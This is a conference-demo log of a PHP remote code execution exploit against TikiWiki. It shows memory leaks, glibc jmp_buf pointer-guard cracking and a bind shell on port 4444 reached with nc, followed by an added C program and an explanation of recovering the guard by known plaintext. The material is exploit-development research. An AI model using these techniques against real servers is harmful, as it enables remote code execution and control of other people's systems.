hozarares

SyScan 2010


$ ./exploit.py -h http://t.testsystem/

PHP xxx() Remote Code Execution Exploit (TikiWiki Version)
Copyright © 2010 Stefan Esser/SektionEins GmbH
*** DO NOT DISTRIBUTE ***

[+] Connecting to determine wordsize
[+] Wordsize is 32 bit
[+] Connecting to determine PHP 5.2.x vs. PHP 5.3.x
[+] PHP version is 5.3.x
[+] Connecting to determine XXX version
[+] PHP version >= 5.3.2
[+] Determining endianess of system
[+] System is little endian
[+] Leaking address of std_object_handlers
[+] Found std_object_handlers address to be 0xb76e84a0
[+] Leaking std_object_handlers
[+] Retrieved std_object_handlers (0xb75b5c60, 0xb75b6230, 0xb75b2300, 0xb75b4c70, 0xb75b52f0, 0xb75b3fc0, 0xb75b42b0, 0xb75b4430, 0x00000000, 0x00000000, 0xb75b3c60, 0xb75b4a40, 0xb75b57a0, 0xb75b4170, 0xb75b27d0, 0xb75b4f00, 0x00000000, 0xb75b28a0, 0xb75b27a0, 0xb75b2af0, 0xb75b2830, 0xb75b46b0, 0x00000000, 0x00000000, 0xb75b2be0)
[+] Optimized to 0xb74008f0
[+] Scanning for executable header
[+] ELF header found at 0xb73ab000
[+] Retrieving and parsing ELF header
[+] Retrieving program headers
[+] Retrieving ELF string table
[+] Looking up ELF symbol: executor_globals
[+] Found executor_globals at 0xb76fe280
[+] Looking up ELF symbol: php_execute_script
[+] Found php_execute_script at 0xb75386c0
[+] Looking up ELF symbol: zend_eval_string
[+] Found zend_eval_string at 0xb7586580
[+] Searching JMPBUF in executor_globals
[+] Found JMPBUF at 0xbfcc64b4
[+] Attempt to crack JMPBUF
[+] Determined stored EIP value 0xb753875a from pattern match
[+] Calculated XORER 0x68ab06ea
[+] Unmangled stored ESP is 0xbfcc5470
[+] Checking memory infront of JMPBUF for overwriting possibilities
[+] Found 0x28 at 0xbfcc6498 (0x3e4) using it as overwrite trampoline
[+] Returning into PHP... Spawning a shell at port 4444
...

$ nc t.testsystem 4444
Welcome to the PHPShell 5/22/2010 1:27 am
system("uname -a");
Linux fedora13x86 2.6.33.4-95.fc13.i686.PAE #1 SMP Thu May 13 05:38:26 UTC 2010 i686 i686 i386 GNU/Linux
system("id");
uid=48(apache) gid=484(apache) groups=484(apache) context=unconfined_u:system_r:httpd_t:s0
...
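The "Attempt to crack JMPBUF" step in the log above works because glibc protects the saved stack and instruction pointers in a jmp_buf with a single per-process secret (the "XORER" in the tool's output): on i386 each pointer is stored as rol32(ptr ^ pointer_guard, 9), on x86_64 with a 17-bit rotate. One known plaintext is therefore enough to recover the secret and decrypt the rest of the jmp_buf, and the exploit gets that plaintext by pattern-matching the stored EIP against php_execute_script, whose address it already has from the ELF symbol lookup. The C program below is an added example and is not part of Stefan Esser's tool; it reproduces only that arithmetic. The EIP 0xb753875a, the guard 0x68ab06ea, the ESP 0xbfcc5470 and the php_execute_script address are taken from the log, while the mangled jmp_buf words are constructed from them here (a real exploit reads them from the target's stack via EG(bailout)), the 0x400 function-length bound and the EBP value are assumptions for the demo, and whether EBP is also mangled depends on the glibc version.

```c
/* Added example: known-plaintext recovery of glibc's pointer guard from a
 * leaked i386 jmp_buf. Not code from the SyScan 2010 exploit above. */
#include <stdint.h>
#include <stdio.h>

/* i386 __jmp_buf word indices (glibc's jmpbuf-offsets.h). */
enum { JB_BX = 0, JB_SI, JB_DI, JB_BP, JB_SP, JB_PC, JB_WORDS };

static uint32_t rol32(uint32_t v, unsigned n) { return (v << n) | (v >> (32 - n)); }
static uint32_t ror32(uint32_t v, unsigned n) { return (v >> n) | (v << (32 - n)); }

/* PTR_MANGLE / PTR_DEMANGLE as glibc implements them for i386:
 * xor with the guard, then rotate left by 9 (x86_64 rotates by 17). */
uint32_t ptr_mangle_i386(uint32_t ptr, uint32_t guard)     { return rol32(ptr ^ guard, 9); }
uint32_t ptr_demangle_i386(uint32_t mangled, uint32_t guard) { return ror32(mangled, 9) ^ guard; }

/* Known-plaintext attack: undo the rotate, then XOR with the real pointer. */
uint32_t recover_guard_i386(uint32_t mangled, uint32_t known_ptr)
{
    return ror32(mangled, 9) ^ known_ptr;
}

/* The "pattern match" precondition: a setjmp() return address must lie
 * strictly inside the function that called setjmp(). */
int eip_in_function(uint32_t eip, uint32_t func_start, uint32_t func_len)
{
    return eip > func_start && eip - func_start < func_len;
}

/* Sanity check on the decrypted ESP: the jmp_buf is a local of the frame
 * whose ESP was saved, so ESP must sit below it and within a sane distance. */
int esp_plausible(uint32_t esp, uint32_t jmpbuf_addr)
{
    return esp < jmpbuf_addr && jmpbuf_addr - esp < 0x10000;
}

/* Crack a leaked jmp_buf: recover the guard from the known stored EIP and
 * return the unmangled stored ESP (guard reported through *guard_out). */
uint32_t crack_jmpbuf_i386(const uint32_t jb[JB_WORDS], uint32_t known_eip, uint32_t *guard_out)
{
    uint32_t guard = recover_guard_i386(jb[JB_PC], known_eip);
    if (guard_out)
        *guard_out = guard;
    return ptr_demangle_i386(jb[JB_SP], guard);
}

int main(void)
{
    /* Values printed in the log; the mangled words are constructed here. */
    const uint32_t php_execute_script = 0xb75386c0;
    const uint32_t jmpbuf_addr = 0xbfcc64b4;
    const uint32_t real_eip = 0xb753875a;   /* php_execute_script+0x9a */
    const uint32_t real_esp = 0xbfcc5470;
    const uint32_t secret   = 0x68ab06ea;   /* the "XORER" */
    uint32_t leaked[JB_WORDS] = {
        0, 0, 0,                /* ebx, esi, edi: never mangled */
        0xbfcc54a8,             /* ebp: assumed unmangled for this demo */
        ptr_mangle_i386(real_esp, secret),
        ptr_mangle_i386(real_eip, secret),
    };
    uint32_t guard = 0, esp;

    if (!eip_in_function(real_eip, php_execute_script, 0x400)) {
        puts("stored EIP does not point into php_execute_script");
        return 1;
    }
    esp = crack_jmpbuf_i386(leaked, real_eip, &guard);
    printf("mangled EIP 0x%08x + known EIP 0x%08x -> guard 0x%08x\n",
           leaked[JB_PC], real_eip, guard);
    printf("mangled ESP 0x%08x -> ESP 0x%08x (%s)\n", leaked[JB_SP], esp,
           esp_plausible(esp, jmpbuf_addr) ? "plausible" : "rejected");
    return esp == real_esp ? 0 : 1;
}
```

The same guard protects every PTR_MANGLE'd pointer in the process (atexit handlers, the libio vtable checks in later glibc, other jmp_bufs), which is why recovering it from one jmp_buf is worth the effort: after this step the attacker can forge a complete jmp_buf that longjmp() will happily restore.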
